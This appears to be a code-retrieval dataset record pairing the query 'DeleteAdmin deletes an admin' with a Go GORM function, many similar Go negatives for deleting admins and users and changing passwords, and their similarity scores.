{\n\t\tpl, _ := pm.getUDP(port)\n\t\tpl.listener.Close()\n\t\tgo runUDP(port, password, auth)\n\t}\n}", "func (r Repository) UpdatePassword(user UpdateUser) Message {\n\tsession, dbMessage := NewMongoSession(address, DBNAME, DBUsername, DBPassword)\n\tif dbMessage.Status != 200 {\n\t\treturn dbMessage\n\t}\n\tdefer session.CloseSession()\n\tvar userCheck shared.User\n\tvar updatedUser shared.User\n\tfindQuery := session.FindUser(DOCNAME, user.UserID, &userCheck)\n\tif findQuery != nil {\n\t\tif findQuery.Error() == \"not found\" {\n\t\t\treturn noSuchUserMessage()\n\t\t}\n\t\treturn internalServerErrorMessage()\n\t}\n\tif userCheck != (shared.User{}) {\n\t\tplainPassword := []byte(user.OldPassword)\n\t\thashPassword := []byte(userCheck.Password)\n\t\tcomparePassword := bcrypt.CompareHashAndPassword(hashPassword, plainPassword)\n\t\tif comparePassword != nil {\n\t\t\treturnMessage := Message{\n\t\t\t\tStatus: 401,\n\t\t\t\tMessage: \"Old password is invalid\",\n\t\t\t}\n\t\t\treturn returnMessage\n\t\t}\n\t\thash, err := bcrypt.GenerateFromPassword([]byte(user.Password), bcrypt.MinCost)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t\tuser.Password = string(hash)\n\t\tupdatedUser.UserID = user.UserID\n\t\tupdatedUser.Password = user.Password\n\t\tupdateError := session.UpdateUser(DOCNAME, user.UserID, updatedUser)\n\t\tif updateError != nil {\n\t\t\treturn internalServerErrorMessage()\n\t\t}\n\t\treturnMessage := Message{\n\t\t\tStatus: 200,\n\t\t\tMessage: \"Password changed successfully\",\n\t\t}\n\t\treturn returnMessage\n\t}\n\treturn internalServerErrorMessage()\n}", "func ChangePassword(op string, np string, _id primitive.ObjectID, c *mongo.Client)\t(models.User, error)\t{\n\t// Get user from id\n\tfmt.Print(\"I was here\")\n\tstringUserID := _id.Hex()\n\tuser, err := GetUserByID(stringUserID, c)\n\tfmt.Print(\"I was here***\")\n\tif err!=nil {\n\t\treturn models.User{}, err\n\t}\n\tfmt.Print(\"I was here****\")\n\tif !util.MatchesWithHash(op, user.Password) {\n\t\treturn models.User{}, errors.New(\"Incorrect Password\")\n\t}\n\tfmt.Print(\"I was here-2\")\n\tuserCollection := c.Database(\"folks\").Collection(\"users\")\n\tctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)\n\tdefer cancel()\n\tpasswordHash, _ := util.HashPassword(np)\n\tfmt.Print(\"I was here-3\")\n\terr = userCollection.FindOneAndUpdate(\n\t\tctx,\n\t\tbson.M{\"_id\": _id},\n\t\tbson.D{\n\t\t\t{\"$set\", bson.D{{\"password\", passwordHash}}},\n\t\t},\n\t).Decode(&user)\n\tfmt.Print(\"I was here-4\")\n\tif err != nil{\n\t\treturn models.User{}, err\n\t}\n\n\treturn user, nil\n\n}", "func (m *BasicAuthentication) SetPassword(value *string)() {\n err := m.GetBackingStore().Set(\"password\", value)\n if err != nil {\n panic(err)\n }\n}" ]
[ "0.7758886", "0.7567674", "0.69972223", "0.69869626", "0.69246644", "0.69102764", "0.6888545", "0.68878937", "0.6886632", "0.68864185", "0.68759125", "0.6830527", "0.68250537", "0.68117106", "0.6811218", "0.678045", "0.6760435", "0.67210925", "0.67163247", "0.6713579", "0.6701596", "0.6689138", "0.6635209", "0.65941", "0.6589821", "0.65739757", "0.6544327", "0.65401334", "0.6535577", "0.653542", "0.65198064", "0.65170246", "0.6497486", "0.64793867", "0.64546025", "0.64540493", "0.6428035", "0.6422434", "0.6414054", "0.6400042", "0.6390472", "0.633808", "0.6324243", "0.6321548", "0.62965083", "0.62936765", "0.62691414", "0.6267559", "0.6234604", "0.6233479", "0.6233246", "0.6210425", "0.6201234", "0.61861444", "0.6174814", "0.61694944", "0.6163702", "0.6138232", "0.6137008", "0.61349964", "0.6134094", "0.61156493", "0.61135733", "0.6101496", "0.60469186", "0.6044328", "0.603785", "0.60300463", "0.602328", "0.60197943", "0.60140747", "0.5981979", "0.598084", "0.59659886", "0.59643567", "0.59611624", "0.59519917", "0.5949978", "0.5947683", "0.59300685", "0.59195346", "0.59150326", "0.5910177", "0.5902639", "0.59018034", "0.5896813", "0.58818257", "0.58813256", "0.58755916", "0.58699495", "0.58667773", "0.58550847", "0.58521503", "0.5849353", "0.58389586", "0.58305264", "0.5827795", "0.58264965", "0.58258265", "0.58248925" ]
0.68512404
11
DeleteAdmin deletes an admin
func (orm *ORM) DeleteAdmin(ctx context.Context, adminID string) (bool, error) { var _Admin models.Admin err := orm.DB.DB.Delete(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return false, errors.New("AdminNotFound") } return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (sec *DatabaseSecurity) DeleteAdmin(login string) error {\n\tif err := sec.db.GetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\tsec.UpdateAdmins(login, true)\n\tif err := sec.db.SetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (s *rpcServer) DeleteAdmin(ctx context.Context, req *api.DeleteAdminRequest) (*api.DeleteAdminResponse, error) {\n\treturn &api.DeleteAdminResponse{}, nil\n}", "func (admin *Admin) DeleteAdmin(db *gorm.DB, id string) (int64, error) {\n\n\tshopID := admin.ShopID.String()\n\tshop := Shop{}\n\toriginalDB := db\n\tdb = db.Debug().Model(&Admin{}).Where(\"id = ?\", id).Take(&Admin{}).Delete(&Admin{})\n\tif db.Error != nil {\n\t\treturn 0, db.Error\n\t}\n\n\tremainingAdmins, err := admin.FindAllAdminsWithShopID(db, shopID)\n\tif err != nil {\n\t\treturn db.RowsAffected, errors.New(\"Couldn't retrieve remaining admins\")\n\t}\n\n\tif len(*remainingAdmins) == 0 && shopID != \"00000000-0000-0000-0000-000000000000\" {\n\n\t\tshopRowsAffected, err := shop.DeleteShop(originalDB, shopID)\n\t\tif err != nil {\n\t\t\treturn db.RowsAffected, errors.New(\"Couldn't delete the associated shop\")\n\t\t}\n\n\t\treturn db.RowsAffected + shopRowsAffected, nil\n\t}\n\n\treturn db.RowsAffected, nil\n}", "func RemoveAdmin() {\n\terr := db.Drop(\"admin\")\n\tfmt.Println(err)\n}", "func (ad *Admin) Delete() error {\n\tif ad.dbCollection == nil {\n\t\treturn errors.New(\"Uninitialized Object Admin\")\n\t}\n\treturn ad.dbCollection.RemoveId(ad.Id)\n}", "func DeleteAdminPermission(id int) (err error) {\n\to := orm.NewOrm()\n\tv := AdminPermission{Id: id}\n\t// ascertain id exists in the database\n\tif err = o.Read(&v); err == nil {\n\t\tvar num int64\n\t\tif num, err = o.Delete(&AdminPermission{Id: id}); err == nil {\n\t\t\tfmt.Println(\"Number of records deleted in database:\", num)\n\t\t}\n\t}\n\treturn\n}", "func (h *handler) DeleteTicketAdmin(w http.ResponseWriter, r *http.Request) {\n\tid := chi.URLParam(r, \"id\")\n\tcontentType := r.Header.Get(\"Content-Type\")\n\n\tmodel := ticket.DeleteTicketRequestModelAdmin{Id: id}\n\n\n\terr := h.ticketService.DeleteTicketAdmin(&model)\n\tif err != nil {\n\t\tif errors.Cause(err) == ticket.ErrTicketInvalid {\n\t\t\thttp.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\tif errors.Cause(err) == ticket.ErrRequestInvalid {\n\t\t\thttp.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\t\tif errors.Cause(err) == ticket.ErrTicketNotFound {\n\t\t\thttp.Error(w, http.StatusText(http.StatusNotFound), http.StatusNotFound)\n\t\t\treturn\n\t\t}\n\t\thttp.Error(w, http.StatusText(http.StatusInternalServerError), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\n\tsetupResponse(w, contentType, []byte{}, http.StatusOK)\n}", "func DeleteAdminByID(idToDelete string) (*mongo.DeleteResult, error) {\n\t// TODO: err handling for ID Parsing\n\toid, _ := primitive.ObjectIDFromHex(idToDelete)\n\treturn adminCollection.DeleteOne(context.TODO(), bson.M{\"_id\": oid})\n}", "func TestDeleteAdminPrivileges(t *testing.T) {\n\tcreds := client.Credentials{Username: testAdmin1Username, Password: testAdmin1UserPassword}\n\ttestData := []testDeleteData{\n\t\ttestDeleteData{testAdmin1ID, http.StatusBadRequest}, // Can't delete yourself\n\t\ttestDeleteData{testStaff1ID, http.StatusOK},\n\t\ttestDeleteData{testBasic1ID, http.StatusOK},\n\t\ttestDeleteData{testBasic1ID, http.StatusBadRequest}, // Attempt to delete the same user\n\t\ttestDeleteData{\"\", http.StatusBadRequest}, // Attempt to delete without specifying user\n\t}\n\tdeleteTest(t, creds, testData)\n}", "func (m *Repository) AdminDeleteReservation(w http.ResponseWriter, r *http.Request) {\n\texploded := strings.Split(r.RequestURI, \"/\")\n\tid, err := strconv.Atoi(exploded[4])\n\tsrc := exploded[3]\n\n\terr = m.DB.DeleteReservation(id)\n\tif err != nil {\n\t\tm.App.ErrorLog.Println(\"Error deleting reservation\")\n\t\tm.App.Session.Put(r.Context(), \"error\", \"Error deleting reservation\")\n\t\thttp.Redirect(w, r, fmt.Sprintf(\"/admin/reservations-%s\", src), http.StatusSeeOther)\n\t\treturn\n\t}\n\n\tm.App.Session.Put(r.Context(), \"flash\", \"Reservation Deleted\")\n\thttp.Redirect(w, r, fmt.Sprintf(\"/admin/reservations-%s\", src), http.StatusSeeOther)\n}", "func (c *AdminClient) Delete() *AdminDelete {\n\tmutation := newAdminMutation(c.config, OpDelete)\n\treturn &AdminDelete{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func DeletePgAdminHandler(w http.ResponseWriter, r *http.Request) {\n\t// swagger:operation DELETE /pgadmin pgadminservice pgadmin-delete\n\t/*```\n\t Delete pgadmin from a cluster\n\t*/\n\t// ---\n\t// produces:\n\t// - application/json\n\t// parameters:\n\t// - name: \"Delete PgAdmin Request\"\n\t// in: \"body\"\n\t// schema:\n\t// \"$ref\": \"#/definitions/DeletePgAdminRequest\"\n\t// responses:\n\t// '200':\n\t// description: Output\n\t// schema:\n\t// \"$ref\": \"#/definitions/DeletePgAdminResponse\"\n\tvar ns string\n\tlog.Debug(\"pgadminservice.DeletePgAdminHandler called\")\n\tusername, err := apiserver.Authn(apiserver.DELETE_PGADMIN_PERM, w, r)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"Restricted\"`)\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tvar request msgs.DeletePgAdminRequest\n\t_ = json.NewDecoder(r.Body).Decode(&request)\n\n\tresp := msgs.DeletePgAdminResponse{}\n\n\tif request.ClientVersion != msgs.PGO_VERSION {\n\t\tresp.SetError(apiserver.VERSION_MISMATCH_ERROR)\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tns, err = apiserver.GetNamespace(apiserver.Clientset, username, request.Namespace)\n\tif err != nil {\n\t\tresp.SetError(err.Error())\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tresp = DeletePgAdmin(&request, ns)\n\tjson.NewEncoder(w).Encode(resp)\n\n}", "func (c *Admin) Delete(id string) error {\n\n\treturn crud.Delete(id).Error()\n}", "func DeleteAdminUsers(id int64) (err error) {\n\n\tv := AdminUsers{Id: id}\n\t// ascertain id exists in the database\n\t_, err = common.Engine.Id(v.Id).Get(&v)\n\tif err == nil {\n\t\tif _, err = common.Engine.ID(v.Id).Delete(&v); err == nil {\n\t\t\tfmt.Println(\"Number of records updated in database:\", v)\n\t\t}\n\t}\n\n\treturn\n}", "func (adminrepo *AdminRepo) DeleteAdminByID(id string ) error {\n\toid , er := primitive.ObjectIDFromHex(id)\n\tif er != nil {\n\t\treturn er \n\t}\n\tdelres , er := adminrepo.DB.Collection(entity.ADMIN).DeleteOne(context.TODO(), bson.D{{\"_id\" , oid }})\n\tif delres.DeletedCount==0 || er != nil {\n\t\treturn errors.New(\" No Record Deleted \")\n\t}\n\treturn nil\n}", "func (h *Handler) serveDeleteClusterAdmin(w http.ResponseWriter, r *http.Request) {}", "func (aaa *NotificationService) DeleteTemplateLocalizationV1Admin(input *notification.DeleteTemplateLocalizationV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Notification.DeleteTemplateLocalizationV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (ct *CompanyTestSuite) TestDeleteByNonAdmin(c *C) {\n\ttoken := getTestDefaultAuthToken()\n\n\t// create new another company\n\tcompanyName := fmt.Sprintf(\"companyName_%v\", time.Now().UnixNano())\n\n\tcompany, err := createTestCompany(companyName, token)\n\tc.Assert(err, IsNil)\n\n\temail := fmt.Sprintf(\"test_%[email protected]\", time.Now().UnixNano())\n\t_, err = createTestUser(email, token, \"\", false)\n\tc.Assert(err, IsNil)\n\n\tcreatedUserToken := getTestLoginToken(fmt.Sprintf(`{\"email\":\"%s\", \"password\": \"12345\"}`, email))\n\n\t// try to remove company\n\treq, err := http.NewRequest(\"DELETE\", fmt.Sprintf(\"http://127.0.0.1:8080/v1/company/%v\", company.Id), nil)\n\tc.Assert(err, IsNil)\n\n\treq.Header.Add(\"Authorization\", createdUserToken)\n\n\tclient := server.GetHTTPClient()\n\tresp, err := client.Do(req)\n\tdefer resp.Body.Close()\n\tc.Assert(err, IsNil)\n\n\tcmResp := server.NewCommonResponse()\n\terr = jsonpb.Unmarshal(resp.Body, cmResp)\n\tc.Assert(err, IsNil)\n\tc.Assert(cmResp.Meta.StatusCode, Equals, HttpStatusForbidden)\n}", "func AdminDeleteTracks(w http.ResponseWriter, _ *http.Request) {\n\t// Get the count of tracks in the database\n\tcount := trackDB.Count()\n\n\t// Check if the count is not -1\n\tif count != -1 {\n\t\t// Delete all tracks\n\t\terr := trackDB.DeleteAll()\n\n\t\t// Check if there was an error\n\t\tif err != nil {\n\t\t\t// Show 500, Internal Server Error\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\t// Set content-type to plain text\n\t\tw.Header().Set(\"Content-Type\", \"text/plain\")\n\n\t\t// Print the feedback\n\t\tfmt.Fprintf(w, \"Deleted documents: %d\", count)\n\t} else {\n\t\t// Show 404, Not Found Error\n\t\thttp.Error(w, http.StatusText(http.StatusNotFound), http.StatusNotFound)\n\t\treturn\n\t}\n}", "func (c *AdminClient) DeleteOne(a *Admin) *AdminDeleteOne {\n\treturn c.DeleteOneID(a.ID)\n}", "func (d *Dao) DelAdminDelay(c context.Context, aid int64) (rows int64, err error) {\n\tres, err := d.db.Exec(c, _delAdminDelaySQL, time.Now(), aid)\n\tif err != nil {\n\t\tlog.Error(\"d.db.Exec(%d) error(%v)\", aid, err)\n\t\treturn\n\t}\n\trows, err = res.RowsAffected()\n\treturn\n}", "func (d *cephobject) Delete(op *operations.Operation) error {\n\tif shared.IsTrue(d.config[\"volatile.pool.pristine\"]) {\n\t\terr := d.radosgwadminUserDelete(context.TODO(), cephobjectRadosgwAdminUser)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Failed deleting admin user %q: %w\", cephobjectRadosgwAdminUser, err)\n\t\t}\n\t}\n\n\treturn nil\n}", "func DeleteRegisteredAdminHandler(pattern string) {\n\tdelete(apiHandlerStore, pattern)\n\tlog.StartLogger.Infof(\"[admin server] [register api] delete registered api %s\", pattern)\n}", "func handlerAdminDeleteTrack(w http.ResponseWriter, r *http.Request) {\n\tsession, err := mgo.Dial(db.HostURL)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer session.Close()\n\t//Deletes all tracks in db\n\t_, err = session.DB(db.Databasename).C(db.TrackCollectionName).RemoveAll(bson.M{})\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n}", "func (aaa *NotificationService) DeleteNotificationTemplateSlugV1Admin(input *notification.DeleteNotificationTemplateSlugV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Notification.DeleteNotificationTemplateSlugV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func AdminDeleteUserPath() string {\n\treturn \"/admin/user\"\n}", "func (c *ShortcutController) Delete() {\n\n\to := orm.NewOrm()\n\ttoken := c.Ctx.Input.Header(\"Authorization\")\n\t_auth := models.Auths{Token: token}\n\tif err := o.Read(&_auth, \"Token\"); err != nil {\n\t\tc.Data[\"json\"] = utils.ResponseError(c.Ctx, \"登录已失效!\", nil)\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\t_admin := models.Admin{ID: _auth.UID}\n\t_ = o.Read(&_admin)\n\n\tid, _ := strconv.ParseInt(c.Ctx.Input.Param(\":id\"), 10, 64)\n\n\tshortcut := models.Shortcut{ID: id}\n\n\t// exist\n\tif err := o.Read(&shortcut); err != nil || shortcut.UID != _admin.ID {\n\t\tc.Data[\"json\"] = utils.ResponseError(c.Ctx, \"删除失败,内容不存在!\", nil)\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\n\tif num, err := o.Delete(&shortcut); err != nil {\n\t\tlogs.Error(err)\n\t\tc.Data[\"json\"] = utils.ResponseError(c.Ctx, \"删除失败!\", nil)\n\t} else {\n\t\tc.Data[\"json\"] = utils.ResponseSuccess(c.Ctx, \"删除成功!\", &num)\n\t}\n\tc.ServeJSON()\n}", "func RemoveByAdmin() echo.HandlerFunc {\n\treturn func(context echo.Context) error {\n\t\tuser, err := FindByID(context.Param(\"userID\"))\n\t\tif err != nil || user == nil {\n\t\t\treturn context.JSON(http.StatusInternalServerError, errors.New(\"Cannot load user with ID %s\"))\n\n\t\t}\n\t\treturn _delete(context, user)\n\t}\n}", "func (a *V0alpha0ApiService) AdminDeleteIdentity(ctx context.Context, id string) V0alpha0ApiApiAdminDeleteIdentityRequest {\n\treturn V0alpha0ApiApiAdminDeleteIdentityRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t\tid: id,\n\t}\n}", "func (dau *DdgAdminUser) Delete(ctx context.Context, key ...interface{}) error {\n\tvar err error\n\tvar dbConn *sql.DB\n\n\t// if deleted, bail\n\tif dau._deleted {\n\t\treturn nil\n\t}\n\n\ttx, err := components.M.GetConnFromCtx(ctx)\n\tif err != nil {\n\t\tdbConn, err = components.M.GetMasterConn()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\ttableName, err := GetDdgAdminUserTableName(key...)\n\tif err != nil {\n\t\treturn err\n\t}\n\t//1\n\n\t// sql query with composite primary key\n\tsqlstr := `UPDATE ` + tableName + ` SET is_del = 1 WHERE id = ?`\n\n\t// run query\n\tutils.GetTraceLog(ctx).Debug(\"DB\", zap.String(\"SQL\", fmt.Sprint(sqlstr, dau.ID)))\n\tif tx != nil {\n\t\t_, err = tx.Exec(sqlstr, dau.ID)\n\t} else {\n\t\t_, err = dbConn.Exec(sqlstr, dau.ID)\n\t}\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// set deleted\n\tdau._deleted = true\n\n\treturn nil\n}", "func (aaa *GroupService) DeleteGroupAdminV1(input *group.DeleteGroupAdminV1Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Group.DeleteGroupAdminV1(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (*AdminInfoService) DeleteInfo(id int) error {\n\tadm := new(entities.AdminInfo)\n\t_, err := entities.MasterEngine.Id(id).Delete(adm)\n\n\treturn err\n}", "func (u *App) Delete(c echo.Context, id string) error {\n\tif err := u.rbac.EnforceRole(c, model.AdminRole); err != nil {\n\t\treturn err\n\t}\n\n\tpost, err := u.udb.View(u.db, id)\n\tif err = zaplog.ZLog(err); err != nil {\n\t\treturn err\n\t}\n\n\tif post.Status != model.StatusDraft {\n\t\treturn zaplog.ZLog(errors.New(\"Apenas é possível eliminar artigos em rascunho\"))\n\t}\n\n\treturn u.udb.Delete(u.db, id)\n}", "func (adminOrg *AdminOrg) Delete(force bool, recursive bool) error {\n\tif force && recursive {\n\t\t//undeploys vapps\n\t\terr := adminOrg.undeployAllVApps()\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error could not undeploy: %s\", err)\n\t\t}\n\t\t//removes vapps\n\t\terr = adminOrg.removeAllVApps()\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error could not remove vapp: %s\", err)\n\t\t}\n\t\t//removes catalogs\n\t\terr = adminOrg.removeCatalogs()\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error could not remove all catalogs: %s\", err)\n\t\t}\n\t\t//removes networks\n\t\terr = adminOrg.removeAllOrgNetworks()\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error could not remove all networks: %s\", err)\n\t\t}\n\t\t//removes org vdcs\n\t\terr = adminOrg.removeAllOrgVDCs()\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error could not remove all vdcs: %s\", err)\n\t\t}\n\t}\n\t// Disable org\n\terr := adminOrg.Disable()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error disabling Org %s: %s\", adminOrg.AdminOrg.Name, err)\n\t}\n\t// Get admin HREF\n\torgHREF, err := url.ParseRequestURI(adminOrg.AdminOrg.HREF)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error getting AdminOrg HREF %s : %s\", adminOrg.AdminOrg.HREF, err)\n\t}\n\treq := adminOrg.client.NewRequest(map[string]string{\n\t\t\"force\": strconv.FormatBool(force),\n\t\t\"recursive\": strconv.FormatBool(recursive),\n\t}, http.MethodDelete, *orgHREF, nil)\n\tresp, err := checkResp(adminOrg.client.Http.Do(req))\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error deleting Org %s: %s\", adminOrg.AdminOrg.ID, err)\n\t}\n\n\ttask := NewTask(adminOrg.client)\n\tif err = decodeBody(types.BodyTypeXML, resp, task.Task); err != nil {\n\t\treturn fmt.Errorf(\"error decoding task response: %s\", err)\n\t}\n\treturn task.WaitTaskCompletion()\n}", "func (m *GroupMutation) ClearAdmin() {\n\tm.clearedadmin = true\n}", "func (api *API) deleteUserHandler() service.Handler {\n\treturn func(ctx context.Context, w http.ResponseWriter, r *http.Request) error {\n\t\tvars := mux.Vars(r)\n\t\tusername := vars[\"permUsernamePublic\"]\n\n\t\tconsumer := getUserConsumer(ctx)\n\n\t\ttx, err := api.mustDB().Begin()\n\t\tif err != nil {\n\t\t\treturn sdk.WrapError(err, \"cannot start transaction\")\n\t\t}\n\t\tdefer tx.Rollback() // nolint\n\n\t\tvar u *sdk.AuthentifiedUser\n\t\tif username == \"me\" {\n\t\t\tu, err = user.LoadByID(ctx, tx, consumer.AuthConsumerUser.AuthentifiedUserID)\n\t\t} else {\n\t\t\tu, err = user.LoadByUsername(ctx, tx, username)\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// We can't delete the last admin\n\t\tif u.Ring == sdk.UserRingAdmin {\n\t\t\tcount, err := user.CountAdmin(tx)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif count < 2 {\n\t\t\t\treturn sdk.NewErrorFrom(sdk.ErrForbidden, \"can't remove the last admin\")\n\t\t\t}\n\t\t}\n\n\t\t// We can't delete a user if it's the last admin in a group\n\t\tvar adminGroupIDs []int64\n\t\tgus, err := group.LoadLinksGroupUserForUserIDs(ctx, tx, []string{u.ID})\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tfor i := range gus {\n\t\t\tif gus[i].Admin {\n\t\t\t\tadminGroupIDs = append(adminGroupIDs, gus[i].GroupID)\n\t\t\t}\n\t\t}\n\t\tif len(adminGroupIDs) > 0 {\n\t\t\tgus, err := group.LoadLinksGroupUserForGroupIDs(ctx, tx, adminGroupIDs)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tadminLeftCount := make(map[int64]int)\n\t\t\tfor _, id := range adminGroupIDs {\n\t\t\t\tadminLeftCount[id] = 0\n\t\t\t}\n\t\t\tfor i := range gus {\n\t\t\t\tif gus[i].AuthentifiedUserID != u.ID && gus[i].Admin {\n\t\t\t\t\tadminLeftCount[gus[i].GroupID] += 1\n\t\t\t\t}\n\t\t\t}\n\t\t\tfor _, count := range adminLeftCount {\n\t\t\t\tif count < 1 {\n\t\t\t\t\treturn sdk.NewErrorFrom(sdk.ErrForbidden, \"cannot remove user because it is the last admin of a group\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tif err := user.DeleteByID(tx, u.ID); err != nil {\n\t\t\treturn sdk.WrapError(err, \"cannot delete user\")\n\t\t}\n\n\t\tif err := tx.Commit(); err != nil {\n\t\t\treturn sdk.WithStack(err)\n\t\t}\n\n\t\treturn service.WriteJSON(w, nil, http.StatusOK)\n\t}\n}", "func UserDelete(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\n}", "func (k Keeper) RemoveAdmin(ctx sdk.Context, admin, remover sdk.AccAddress) (err sdk.Error) {\r\n\tif !k.isAdmin(ctx, remover) {\r\n\t\terr = ErrAddressNotAuthorised()\r\n\t}\r\n\r\n\tparams := k.GetParams(ctx)\r\n\tfor i, currentAdmin := range params.StakingAdmins {\r\n\t\tif currentAdmin.Equals(admin) {\r\n\t\t\tparams.StakingAdmins = append(params.StakingAdmins[:i], params.StakingAdmins[i+1:]...)\r\n\t\t}\r\n\t}\r\n\r\n\tk.SetParams(ctx, params)\r\n\r\n\treturn\r\n}", "func adminImagesDelete(w http.ResponseWriter, r *http.Request) {\n\ttype response struct {\n\t\tOk bool\n\t}\n\tid := r.URL.Path\n\tresp := response{}\n\n\t_, err := db.Exec(`DELETE FROM images WHERE appointment_id = $1`, id)\n\tif err != nil {\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\t// set ok and send\n\tresp.Ok = true\n\terr = json.NewEncoder(w).Encode(resp)\n\tif err != nil {\n\t\tlog.Println(\"appointment img delete:\", err)\n\t}\n}", "func (aaa *ThirdPartyService) AdminDeleteThirdPartyConfig(input *third_party.AdminDeleteThirdPartyConfigParams) (string, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tnoContent, badRequest, unauthorized, forbidden, internalServerError, err := aaa.Client.ThirdParty.AdminDeleteThirdPartyConfig(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn \"\", badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn \"\", unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn \"\", forbidden\n\t}\n\tif internalServerError != nil {\n\t\treturn \"\", internalServerError\n\t}\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn noContent.GetPayload(), nil\n}", "func (aaa *NotificationService) DeleteNotificationTopicV1Admin(input *notification.DeleteNotificationTopicV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Notification.DeleteNotificationTopicV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (o *CMFAdminMenu) Delete(ctx context.Context, exec boil.ContextExecutor) (int64, error) {\n\tif o == nil {\n\t\treturn 0, errors.New(\"models: no CMFAdminMenu provided for delete\")\n\t}\n\n\tif err := o.doBeforeDeleteHooks(ctx, exec); err != nil {\n\t\treturn 0, err\n\t}\n\n\targs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), cmfAdminMenuPrimaryKeyMapping)\n\tsql := \"DELETE FROM `cmf_admin_menu` WHERE `id`=?\"\n\n\tif boil.IsDebug(ctx) {\n\t\twriter := boil.DebugWriterFrom(ctx)\n\t\tfmt.Fprintln(writer, sql)\n\t\tfmt.Fprintln(writer, args...)\n\t}\n\tresult, err := exec.ExecContext(ctx, sql, args...)\n\tif err != nil {\n\t\treturn 0, errors.Wrap(err, \"models: unable to delete from cmf_admin_menu\")\n\t}\n\n\trowsAff, err := result.RowsAffected()\n\tif err != nil 